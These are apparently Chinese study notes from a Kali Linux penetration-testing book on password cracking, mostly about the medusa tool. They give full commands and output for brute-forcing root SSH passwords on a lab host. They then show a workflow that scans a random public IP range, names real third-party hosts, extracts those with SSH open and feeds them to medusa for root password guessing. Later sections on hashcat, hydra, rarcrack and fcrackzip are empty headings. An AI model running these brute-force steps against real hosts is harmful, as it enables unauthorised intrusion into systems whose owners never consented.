參考書 《kali linux滲透測試技術詳解》 清華大學出版社 2015 楊波
一、medusa使用
原理:並行登陸破解
1、只輸入單個命令,是查看幫助
root@kali:/tools/mima# medusa
我們看看medusa有哪些模塊支持什么功能的破解
root@perl-exploit:/pentest/exploits/framework3# medusa -d
Available modules in "/usr/lib/medusa/modules" : + cvs.mod : Brute force module for CVS sessions : version 1.0.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0 + http.mod : Brute force module for HTTP : version 1.3.0 + imap.mod : Brute force module for IMAP sessions : version 1.2.0 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1 + mysql.mod : Brute force module for MySQL sessions : version 1.2 + ncp.mod : Brute force module for NCP sessions : version 1.0.0 + nntp.mod : Brute force module for NNTP sessions : version 1.0.0 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2 + pop3.mod : Brute force module for POP3 sessions : version 1.2 + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2 + rsh.mod : Brute force module for RSH sessions : version 1.0.1 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2 + svn.mod : Brute force module for Subversion sessions : version 1.0.0 + telnet.mod : Brute force module for telnet sessions : version 1.2.2 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1 + vnc.mod : Brute force module for VNC sessions : version 1.0.1 + web-form.mod : Brute force module for web forms : version 1.0.0 + wrapper.mod : Generic Wrapper Module : version 1.0.1
恩,我們要破解ssh,所以用-M ssh參數加載ssh模塊,后面不用跟.mod
2、用口令文件破解單個IP,破解成功后會退出
root@kali:/tools/mima# medusa -h 192.168.80.131 -u root -P rkl.txt -M ssh
.... ACCOUNT CHECK: [ssh] Host: 192.168.80.131 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (28 of 2108 complete) ACCOUNT CHECK: [ssh] Host: 192.168.80.131 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (29 of 2108 complete) ACCOUNT FOUND: [ssh] Host: 192.168.80.131 User: root Password: 123456 [SUCCESS]
3、結合nmap、cut
首先我們確定目標,掃描開放ssh的機器,隨便找個段掃描一下吧
root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/ Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
然后是漫長的等待,上面的參數掃描意思是,掃描整個段開了22端口的機器,並且判斷服務版本,保存到ssh文件中。
類似這樣的,這里我們要整理一下,把開了ssh的IP整理出來,現在明白oG保存的意義所在了
root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt
root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
二、HASH暴力破解工具-Hashcat
http://www.sohu.com/a/248610818_609556
三、在線密碼破解之hydra
四、rar密碼破解之rarcrack
五、zip密碼破解之fcrackzip